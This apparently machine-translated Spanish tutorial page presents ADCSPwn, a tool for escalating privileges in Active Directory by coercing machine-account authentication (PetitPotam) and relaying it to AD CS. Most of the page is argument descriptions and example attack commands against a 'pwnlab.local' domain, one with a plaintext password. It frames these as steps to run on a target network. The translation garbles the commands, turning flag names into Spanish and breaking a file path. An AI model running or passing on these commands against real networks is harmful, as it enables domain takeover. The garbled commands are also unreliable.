Tutoriales

Una herramienta para escalar permisos en una red de Active Directory

ADCSPwn es una herramienta para escalar permisos en una red de Active Directory forzando la autenticación de cuentas de computadora (Petitpotam) y enviándola al servicio de certificados.

Uso

Correr ADCSPwn en su red de destino.

Autor: @batsec – MDsec ActiveBreach
Colaborador: @Flangvik – TrustedSec
adcspwn.exe –adcs –port [local port] -Control remoto [computer]Argumentos requeridos:
adcs: esta es la dirección del servidor AD CS al que se reenviará la autenticación.
Argumentos opcionales:
puerto: el puerto en el que está escuchando ADCSPwn.
remoto: equipo remoto desde el que se activará la autenticación.
username: nombre de usuario para contexto que no es de dominio.
contraseña: contraseña para contexto que no es de dominio.
dc: controlador de dominio para consultar plantillas de certificado (LDAP).
unc: establece la ruta de devolución de llamada UNC definida por el usuario para EfsRpcOpenFileRaw (Petitpotam).
salida: ruta de salida para guardar el crt generado en base64.
Ejemplo de aplicación:
adcspwn.exe –adcs cs.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –Port 9001
adcspwn.exe –adcs cs.pwnlab.local –Remote dc.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –Remote dc.pwnlab.local –Port 9001
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –salida C: Temp cert_b64.txt
adcspwn.exe –adcs cs.pwnlab.local –Remote dc.pwnlab.local –Nombre de usuario pwnlab.local mranderson –Password The0nly0ne! –Dc dc.pwnlab.local
adcspwn.exe –adcs cs.pwnlab.local –remote dc.pwnlab.local –dc dc.pwnlab.local –unc WIN-WORK01.pwnlab.local made up share

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba